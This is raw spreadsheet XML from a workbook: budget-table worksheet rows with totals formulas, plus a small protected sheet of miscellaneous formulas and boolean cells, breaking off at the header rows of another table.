      <c r="C63" s="3">
        <v>194</v>
      </c>
      <c r="D63" s="3"/>
      <c r="E63" s="3">
        <f t="shared" si="36"/>
        <v>194</v>
      </c>
      <c r="F63" s="3">
        <f t="shared" si="35"/>
        <v>719</v>
      </c>
      <c r="G63" s="3"/>
      <c r="H63" s="3"/>
      <c r="I63" s="3"/>
      <c r="J63" s="3"/>
      <c r="K63" s="3"/>
      <c r="L63" s="3"/>
      <c r="M63" s="3"/>
      <c r="N63" s="3"/>
      <c r="O63" s="3"/>
      <c r="P63" s="3"/>
      <c r="Q63" s="3"/>
      <c r="R63" s="3"/>
      <c r="S63" s="3"/>
      <c r="T63" s="3"/>
      <c r="U63" s="3"/>
      <c r="V63" s="3"/>
      <c r="W63" s="3"/>
    </row>
    <row r="64" spans="1:23" ht="15" hidden="1" customHeight="1">
      <c r="A64" s="3" t="s">
        <v>113</v>
      </c>
      <c r="B64" s="3">
        <v>375</v>
      </c>
      <c r="C64" s="3"/>
      <c r="D64" s="3"/>
      <c r="E64" s="3">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="F64" s="3">
        <f t="shared" si="35"/>
        <v>375</v>
      </c>
      <c r="G64" s="3"/>
      <c r="H64" s="3"/>
      <c r="I64" s="3"/>
      <c r="J64" s="3"/>
      <c r="K64" s="3"/>
      <c r="L64" s="3"/>
      <c r="M64" s="3"/>
      <c r="N64" s="3"/>
      <c r="O64" s="3"/>
      <c r="P64" s="3"/>
      <c r="Q64" s="3"/>
      <c r="R64" s="3"/>
      <c r="S64" s="3"/>
      <c r="T64" s="3"/>
      <c r="U64" s="3"/>
      <c r="V64" s="3"/>
      <c r="W64" s="3"/>
    </row>
    <row r="65" spans="1:24" ht="15" hidden="1" customHeight="1">
      <c r="A65" s="3" t="s">
        <v>114</v>
      </c>
      <c r="B65" s="3"/>
      <c r="C65" s="3"/>
      <c r="D65" s="3"/>
      <c r="E65" s="3">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="F65" s="3">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="G65" s="3"/>
      <c r="H65" s="3"/>
      <c r="I65" s="3"/>
      <c r="J65" s="3"/>
      <c r="K65" s="3"/>
      <c r="L65" s="3"/>
      <c r="M65" s="3"/>
      <c r="N65" s="3"/>
      <c r="O65" s="3"/>
      <c r="P65" s="3"/>
      <c r="Q65" s="3"/>
      <c r="R65" s="3"/>
      <c r="S65" s="3"/>
      <c r="T65" s="3"/>
      <c r="U65" s="3"/>
      <c r="V65" s="3"/>
      <c r="W65" s="3"/>
    </row>
    <row r="66" spans="1:24" ht="15" hidden="1" customHeight="1">
      <c r="A66" s="3" t="s">
        <v>115</v>
      </c>
      <c r="B66" s="3">
        <v>826</v>
      </c>
      <c r="C66" s="3">
        <v>2090</v>
      </c>
      <c r="D66" s="3"/>
      <c r="E66" s="3">
        <f t="shared" si="36"/>
        <v>2090</v>
      </c>
      <c r="F66" s="3">
        <f t="shared" si="35"/>
        <v>2916</v>
      </c>
      <c r="G66" s="3"/>
      <c r="H66" s="3"/>
      <c r="I66" s="3"/>
      <c r="J66" s="3"/>
      <c r="K66" s="3"/>
      <c r="L66" s="3"/>
      <c r="M66" s="3"/>
      <c r="N66" s="3"/>
      <c r="O66" s="3"/>
      <c r="P66" s="3"/>
      <c r="Q66" s="3"/>
      <c r="R66" s="3"/>
      <c r="S66" s="3"/>
      <c r="T66" s="3"/>
      <c r="U66" s="3"/>
      <c r="V66" s="3"/>
      <c r="W66" s="3"/>
    </row>
    <row r="67" spans="1:24" ht="15" hidden="1" customHeight="1">
      <c r="A67" s="3" t="s">
        <v>116</v>
      </c>
      <c r="B67" s="3">
        <v>9061</v>
      </c>
      <c r="C67" s="3">
        <v>735</v>
      </c>
      <c r="D67" s="3"/>
      <c r="E67" s="3">
        <f t="shared" si="36"/>
        <v>735</v>
      </c>
      <c r="F67" s="3">
        <f t="shared" si="35"/>
        <v>9796</v>
      </c>
      <c r="G67" s="3"/>
      <c r="H67" s="3"/>
      <c r="I67" s="3"/>
      <c r="J67" s="3"/>
      <c r="K67" s="3"/>
      <c r="L67" s="3"/>
      <c r="M67" s="3"/>
      <c r="N67" s="3"/>
      <c r="O67" s="3"/>
      <c r="P67" s="3"/>
      <c r="Q67" s="3"/>
      <c r="R67" s="3"/>
      <c r="S67" s="3"/>
      <c r="T67" s="3"/>
      <c r="U67" s="3"/>
      <c r="V67" s="3"/>
      <c r="W67" s="3"/>
    </row>
    <row r="68" spans="1:24" ht="15" hidden="1" customHeight="1">
      <c r="A68" s="3" t="s">
        <v>117</v>
      </c>
      <c r="B68" s="3">
        <v>54</v>
      </c>
      <c r="C68" s="3">
        <v>287</v>
      </c>
      <c r="D68" s="3"/>
      <c r="E68" s="3">
        <f t="shared" si="36"/>
        <v>287</v>
      </c>
      <c r="F68" s="3">
        <f t="shared" si="35"/>
        <v>341</v>
      </c>
      <c r="G68" s="3"/>
      <c r="H68" s="3"/>
      <c r="I68" s="3"/>
      <c r="J68" s="3"/>
      <c r="K68" s="3"/>
      <c r="L68" s="3"/>
      <c r="M68" s="3"/>
      <c r="N68" s="3"/>
      <c r="O68" s="3"/>
      <c r="P68" s="3"/>
      <c r="Q68" s="3"/>
      <c r="R68" s="3"/>
      <c r="S68" s="3"/>
      <c r="T68" s="3"/>
      <c r="U68" s="3"/>
      <c r="V68" s="3"/>
      <c r="W68" s="3"/>
    </row>
    <row r="69" spans="1:24" ht="15" hidden="1" customHeight="1">
      <c r="A69" s="3" t="s">
        <v>118</v>
      </c>
      <c r="B69" s="3"/>
      <c r="C69" s="3">
        <v>80</v>
      </c>
      <c r="D69" s="3"/>
      <c r="E69" s="3">
        <f t="shared" si="36"/>
        <v>80</v>
      </c>
      <c r="F69" s="3">
        <f t="shared" si="35"/>
        <v>80</v>
      </c>
      <c r="G69" s="3"/>
      <c r="H69" s="3"/>
      <c r="I69" s="3"/>
      <c r="J69" s="3"/>
      <c r="K69" s="3"/>
      <c r="L69" s="3"/>
      <c r="M69" s="3"/>
      <c r="N69" s="3"/>
      <c r="O69" s="3"/>
      <c r="P69" s="3"/>
      <c r="Q69" s="3"/>
      <c r="R69" s="3"/>
      <c r="S69" s="3"/>
      <c r="T69" s="3"/>
      <c r="U69" s="3"/>
      <c r="V69" s="3"/>
      <c r="W69" s="3"/>
    </row>
    <row r="70" spans="1:24" s="32" customFormat="1" ht="25.5" customHeight="1">
      <c r="A70" s="46" t="s">
        <v>119</v>
      </c>
      <c r="B70" s="5"/>
      <c r="C70" s="5">
        <v>31900</v>
      </c>
      <c r="D70" s="5"/>
      <c r="E70" s="5">
        <f t="shared" si="36"/>
        <v>31900</v>
      </c>
      <c r="F70" s="5">
        <f t="shared" si="35"/>
        <v>31900</v>
      </c>
      <c r="G70" s="5"/>
      <c r="H70" s="5"/>
      <c r="I70" s="5"/>
      <c r="J70" s="5"/>
      <c r="K70" s="5"/>
      <c r="L70" s="5"/>
      <c r="M70" s="5"/>
      <c r="N70" s="5"/>
      <c r="O70" s="5"/>
      <c r="P70" s="5"/>
      <c r="Q70" s="5"/>
      <c r="R70" s="5"/>
      <c r="S70" s="5"/>
      <c r="T70" s="5"/>
      <c r="U70" s="5"/>
      <c r="V70" s="5"/>
      <c r="W70" s="5"/>
    </row>
    <row r="71" spans="1:24" s="32" customFormat="1" ht="19.5" hidden="1" customHeight="1">
      <c r="A71" s="46" t="s">
        <v>120</v>
      </c>
      <c r="B71" s="5"/>
      <c r="C71" s="5"/>
      <c r="D71" s="5"/>
      <c r="E71" s="5"/>
      <c r="F71" s="5">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="G71" s="5"/>
      <c r="H71" s="5"/>
      <c r="I71" s="5"/>
      <c r="J71" s="5"/>
      <c r="K71" s="5"/>
      <c r="L71" s="5"/>
      <c r="M71" s="5"/>
      <c r="N71" s="5"/>
      <c r="O71" s="5"/>
      <c r="P71" s="5"/>
      <c r="Q71" s="5"/>
      <c r="R71" s="5"/>
      <c r="S71" s="5"/>
      <c r="T71" s="5"/>
      <c r="U71" s="5"/>
      <c r="V71" s="5"/>
      <c r="W71" s="5"/>
    </row>
    <row r="72" spans="1:24" s="32" customFormat="1" ht="20.25" customHeight="1">
      <c r="A72" s="5" t="s">
        <v>121</v>
      </c>
      <c r="B72" s="5">
        <v>60259</v>
      </c>
      <c r="C72" s="5">
        <f>135541-2300+1676+24</f>
        <v>134941</v>
      </c>
      <c r="D72" s="5"/>
      <c r="E72" s="5"/>
      <c r="F72" s="5">
        <f t="shared" si="35"/>
        <v>195200</v>
      </c>
      <c r="G72" s="5"/>
      <c r="H72" s="5"/>
      <c r="I72" s="5"/>
      <c r="J72" s="5"/>
      <c r="K72" s="5"/>
      <c r="L72" s="5"/>
      <c r="M72" s="5"/>
      <c r="N72" s="5"/>
      <c r="O72" s="5"/>
      <c r="P72" s="5"/>
      <c r="Q72" s="5"/>
      <c r="R72" s="5"/>
      <c r="S72" s="5"/>
      <c r="T72" s="5"/>
      <c r="U72" s="5"/>
      <c r="V72" s="5"/>
      <c r="W72" s="5"/>
    </row>
    <row r="73" spans="1:24" s="32" customFormat="1" ht="18" customHeight="1">
      <c r="A73" s="5" t="s">
        <v>122</v>
      </c>
      <c r="B73" s="5">
        <v>4453</v>
      </c>
      <c r="C73" s="5">
        <v>-427</v>
      </c>
      <c r="D73" s="5"/>
      <c r="E73" s="5">
        <f>C73</f>
        <v>-427</v>
      </c>
      <c r="F73" s="5">
        <f t="shared" si="35"/>
        <v>4026</v>
      </c>
      <c r="G73" s="5"/>
      <c r="H73" s="5"/>
      <c r="I73" s="5"/>
      <c r="J73" s="5"/>
      <c r="K73" s="5"/>
      <c r="L73" s="5"/>
      <c r="M73" s="5"/>
      <c r="N73" s="5"/>
      <c r="O73" s="5"/>
      <c r="P73" s="5"/>
      <c r="Q73" s="5"/>
      <c r="R73" s="5"/>
      <c r="S73" s="5"/>
      <c r="T73" s="5"/>
      <c r="U73" s="5"/>
      <c r="V73" s="5"/>
      <c r="W73" s="5"/>
    </row>
    <row r="74" spans="1:24" s="32" customFormat="1" ht="21.75" customHeight="1">
      <c r="A74" s="5" t="s">
        <v>123</v>
      </c>
      <c r="B74" s="5">
        <f t="shared" ref="B74" si="37">B28+B29+B70+B71+B72+B73</f>
        <v>480830.77500000002</v>
      </c>
      <c r="C74" s="5">
        <f>C28+C29+C70+C71+C72+C73</f>
        <v>174915.55</v>
      </c>
      <c r="D74" s="5">
        <f>D28+D29+D70+D71+D72+D73</f>
        <v>0</v>
      </c>
      <c r="E74" s="5">
        <f>E28+E29+E70+E71+E72+E73</f>
        <v>39974.550000000003</v>
      </c>
      <c r="F74" s="5">
        <f>F28+F29+F70+F71+F72+F73</f>
        <v>655746.32499999995</v>
      </c>
      <c r="G74" s="5" t="s">
        <v>124</v>
      </c>
      <c r="H74" s="5">
        <f>H28+H29+H41+H39</f>
        <v>480831</v>
      </c>
      <c r="I74" s="5">
        <f t="shared" ref="I74" si="38">I28+I29+I41+I39</f>
        <v>174915</v>
      </c>
      <c r="J74" s="5">
        <f t="shared" ref="J74:W74" si="39">J28+J29+J41+J39</f>
        <v>0</v>
      </c>
      <c r="K74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="L74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="M74" s="5">
        <f t="shared" si="39"/>
        <v>1676</v>
      </c>
      <c r="N74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="O74" s="5">
        <f t="shared" si="39"/>
        <v>31900</v>
      </c>
      <c r="P74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="Q74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="R74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="S74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="T74" s="5">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="U74" s="5">
        <f t="shared" si="39"/>
        <v>34756</v>
      </c>
      <c r="V74" s="5">
        <f t="shared" si="39"/>
        <v>106583</v>
      </c>
      <c r="W74" s="5">
        <f t="shared" si="39"/>
        <v>655746.32499999995</v>
      </c>
      <c r="X74" s="32">
        <f>W74-F74</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="Y3:Y4"/>
    <mergeCell ref="A1:W1"/>
    <mergeCell ref="V2:W2"/>
    <mergeCell ref="A3:F3"/>
    <mergeCell ref="G3:W3"/>
    <mergeCell ref="X3:X4"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.15625" right="0.15625" top="0.59027777777777801" bottom="0.59027777777777801" header="0.51180555555555596" footer="0.51180555555555596"/>
  <pageSetup paperSize="9" scale="85" orientation="landscape" useFirstPageNumber="1"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C&amp;P</oddFooter>
  </headerFooter>
  <rowBreaks count="1" manualBreakCount="1">
    <brk id="28" max="16383" man="1"/>
  </rowBreaks>
  <legacyDrawing r:id="rId1"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet10.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:C41"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.25" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="26.875" customWidth="1"/>
    <col min="2" max="2" width="1.25" customWidth="1"/>
    <col min="3" max="3" width="28.875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="A1" t="s">
        <v>779</v>
      </c>
      <c r="C1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="1:3">
      <c r="A2" t="s">
        <v>780</v>
      </c>
    </row>
    <row r="3" spans="1:3">
      <c r="A3" t="s">
        <v>781</v>
      </c>
      <c r="C3" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="4" spans="1:3">
      <c r="A4" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4">
        <f>TAN(C18)</f>
        <v>1.5574077246549023</v>
      </c>
    </row>
    <row r="5" spans="1:3">
      <c r="C5" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:3">
      <c r="C6" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="7" spans="1:3">
      <c r="A7" t="s">
        <v>783</v>
      </c>
      <c r="C7" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3">
      <c r="A8" t="s">
        <v>784</v>
      </c>
      <c r="C8" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:3">
      <c r="A9" t="s">
        <v>785</v>
      </c>
      <c r="C9" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:3">
      <c r="A10" t="s">
        <v>786</v>
      </c>
      <c r="C10">
        <f>TAN(A21)</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3">
      <c r="A11" t="s">
        <v>787</v>
      </c>
      <c r="C11" t="e">
        <f ca="1">INDIRECT("6:30:00 PM","Hello")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="12" spans="1:3">
      <c r="C12" t="e">
        <f ca="1">INDIRECT("6:30:00 AM","Morning")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="13" spans="1:3">
      <c r="C13" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:3">
      <c r="A14" t="s">
        <v>788</v>
      </c>
      <c r="C14" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:3">
      <c r="A15" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="16" spans="1:3">
      <c r="A16" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" t="b">
        <v>1</v>
      </c>
      <c r="C17" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="C18" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="C19" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:3">
      <c r="A20" t="s">
        <v>790</v>
      </c>
      <c r="C20" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:3">
      <c r="A21">
        <v>0</v>
      </c>
      <c r="C21" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:3">
      <c r="A22" t="b">
        <v>0</v>
      </c>
      <c r="C22" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:3">
      <c r="A23" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C23" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:3">
      <c r="A24" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:3">
      <c r="A25" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3">
      <c r="A26" t="e">
        <f t="shared" ref="A26" si="0">#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C26" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="27" spans="1:3">
      <c r="A27" t="str">
        <f>ROMAN(1)</f>
        <v>I</v>
      </c>
      <c r="C27">
        <f>TAN(C19)</f>
        <v>1.5574077246549023</v>
      </c>
    </row>
    <row r="28" spans="1:3">
      <c r="A28" t="str">
        <f>ROMAN(1)</f>
        <v>I</v>
      </c>
      <c r="C28" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:3">
      <c r="A29" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C29" t="e">
        <f t="shared" ref="C29" si="1">#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="30" spans="1:3">
      <c r="A30">
        <f>TAN(C18)</f>
        <v>1.5574077246549023</v>
      </c>
      <c r="C30" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:3">
      <c r="A31" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C31" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:3">
      <c r="A32" t="b">
        <v>1</v>
      </c>
      <c r="C32" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="33" spans="1:3">
      <c r="A33" t="b">
        <v>1</v>
      </c>
      <c r="C33">
        <f>TAN(C19)</f>
        <v>1.5574077246549023</v>
      </c>
    </row>
    <row r="34" spans="1:3">
      <c r="A34" t="b">
        <v>1</v>
      </c>
      <c r="C34" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="35" spans="1:3">
      <c r="A35" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C35" t="e">
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" t="b">
        <v>1</v>
      </c>
      <c r="C36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:3">
      <c r="A37" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:3">
      <c r="A38" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:3">
      <c r="A39" t="e">
        <f>AVERAGE(A3)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="C39" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:3">
      <c r="A40" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C40" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3">
      <c r="A41" t="b">
        <v>1</v>
      </c>
      <c r="C41" t="b">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection password="8863" sheet="1" objects="1" scenarios="1"/>
  <phoneticPr fontId="10" type="noConversion"/>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dimension ref="A1:C41"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.25" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="26.875" customWidth="1"/>
    <col min="2" max="2" width="1.25" customWidth="1"/>
    <col min="3" max="3" width="28.875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="A1" t="s">
        <v>779</v>
      </c>
      <c r="C1" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="1:3">
      <c r="A2" t="s">
        <v>780</v>
      </c>
    </row>
    <row r="3" spans="1:3">
      <c r="A3" t="s">
        <v>781</v>
      </c>
      <c r="C3" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="4" spans="1:3">
      <c r="A4">
        <v>3</v>
      </c>
      <c r="C4">
        <f>TAN(C18)</f>
        <v>1.5574077246549023</v>
      </c>
    </row>
    <row r="5" spans="1:3">
      <c r="C5" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:3">
      <c r="C6" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="7" spans="1:3">
      <c r="A7" t="s">
        <v>783</v>
      </c>
      <c r="C7" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3">
      <c r="A8" t="s">
        <v>784</v>
      </c>
      <c r="C8" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:3">
      <c r="A9" t="s">
        <v>785</v>
      </c>
      <c r="C9" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:3">
      <c r="A10" t="s">
        <v>786</v>
      </c>
      <c r="C10">
        <f>TAN(A21)</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3">
      <c r="A11" t="s">
        <v>787</v>
      </c>
      <c r="C11" t="e">
        <f ca="1">INDIRECT("6:30:00 PM","Hello")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="12" spans="1:3">
      <c r="C12" t="e">
        <f ca="1">INDIRECT("6:30:00 AM","Morning")</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="13" spans="1:3">
      <c r="C13" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:3">
      <c r="A14" t="s">
        <v>788</v>
      </c>
      <c r="C14" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:3">
      <c r="A15" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="16" spans="1:3">
      <c r="A16" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" t="b">
        <v>1</v>
      </c>
      <c r="C17" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="C18" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="C19" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:3">
      <c r="A20" t="s">
        <v>790</v>
      </c>
      <c r="C20" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:3">
      <c r="A21">
        <v>0</v>
      </c>
      <c r="C21" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:3">
      <c r="A22" t="b">
        <v>1</v>
      </c>
      <c r="C22" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:3">
      <c r="A23" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C23" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:3">
      <c r="A24" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:3">
      <c r="A25" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3">
      <c r="A26" t="e">
        <f t="shared" ref="A26" si="0">#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C26" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="27" spans="1:3">
      <c r="A27" t="str">
        <f>ROMAN(1)</f>
        <v>I</v>
      </c>
      <c r="C27">
        <f>TAN(C19)</f>
        <v>1.5574077246549023</v>
      </c>
    </row>
    <row r="28" spans="1:3">
      <c r="A28" t="str">
        <f>ROMAN(1)</f>
        <v>I</v>
      </c>
      <c r="C28" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:3">
      <c r="A29" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C29" t="e">
        <f t="shared" ref="C29" si="1">#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="30" spans="1:3">
      <c r="A30">
        <f>TAN(C18)</f>
        <v>1.5574077246549023</v>
      </c>
      <c r="C30" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:3">
      <c r="A31" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C31" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:3">
      <c r="A32" t="b">
        <v>1</v>
      </c>
      <c r="C32" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="33" spans="1:3">
      <c r="A33" t="b">
        <v>1</v>
      </c>
      <c r="C33">
        <f>TAN(C19)</f>
        <v>1.5574077246549023</v>
      </c>
    </row>
    <row r="34" spans="1:3">
      <c r="A34" t="b">
        <v>1</v>
      </c>
      <c r="C34" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="35" spans="1:3">
      <c r="A35" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C35" t="e">
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" t="b">
        <v>1</v>
      </c>
      <c r="C36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:3">
      <c r="A37" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:3">
      <c r="A38" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:3">
      <c r="A39" t="e">
        <f>AVERAGE(A3)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="C39" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:3">
      <c r="A40" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C40" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3">
      <c r="A41" t="b">
        <v>1</v>
      </c>
      <c r="C41" t="b">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection password="8863" sheet="1" objects="1" scenarios="1"/>
  <phoneticPr fontId="10" type="noConversion"/>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dimension ref="A1:I45"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="4" topLeftCell="B5" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" sqref="A1:I1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="26.125" customWidth="1"/>
    <col min="2" max="2" width="10.125" customWidth="1"/>
    <col min="3" max="3" width="10.625" customWidth="1"/>
    <col min="4" max="4" width="12.25" customWidth="1"/>
    <col min="5" max="5" width="12.25" style="38" customWidth="1"/>
    <col min="6" max="6" width="11.75" customWidth="1"/>
    <col min="7" max="7" width="12.875" customWidth="1"/>
    <col min="8" max="8" width="12.125" style="38" customWidth="1"/>
    <col min="9" max="9" width="10.5" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="27" customHeight="1">
      <c r="A1" s="63" t="s">
        <v>804</v>
      </c>
      <c r="B1" s="63"/>
      <c r="C1" s="63"/>
      <c r="D1" s="63"/>
      <c r="E1" s="63"/>
      <c r="F1" s="63"/>
      <c r="G1" s="63"/>
      <c r="H1" s="63"/>
      <c r="I1" s="63"/>
    </row>
    <row r="2" spans="1:9" ht="15" customHeight="1">
      <c r="A2" s="39"/>
      <c r="B2" s="39"/>
      <c r="C2" s="39"/>
      <c r="D2" s="39"/>
      <c r="E2" s="40"/>
      <c r="F2" s="39"/>
      <c r="G2" s="39"/>
      <c r="H2" s="40"/>
      <c r="I2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:9" s="2" customFormat="1" ht="17.25" customHeight="1">
      <c r="A3" s="64" t="s">
        <v>125</v>
      </c>
      <c r="B3" s="64" t="s">
        <v>126</v>
      </c>
      <c r="C3" s="64"/>
      <c r="D3" s="64"/>
      <c r="E3" s="64"/>
      <c r="F3" s="64"/>
      <c r="G3" s="64"/>
      <c r="H3" s="64"/>
      <c r="I3" s="64" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="4" spans="1:9" s="2" customFormat="1" ht="23.25" customHeight="1">
      <c r="A4" s="64"/>
      <c r="B4" s="41" t="s">
        <v>128</v>
      </c>
      <c r="C4" s="41" t="s">
        <v>129</v>
      </c>
      <c r="D4" s="41" t="s">
        <v>130</v>
      </c>
      <c r="E4" s="42" t="s">
        <v>131</v>
      </c>
      <c r="F4" s="41" t="s">
        <v>132</v>
      </c>
      <c r="G4" s="41" t="s">
        <v>133</v>
      </c>
      <c r="H4" s="42" t="s">
        <v>134</v>
      </c>
      <c r="I4" s="64"/>
    </row>
    <row r="5" spans="1:9" s="2" customFormat="1" ht="13.5" customHeight="1">
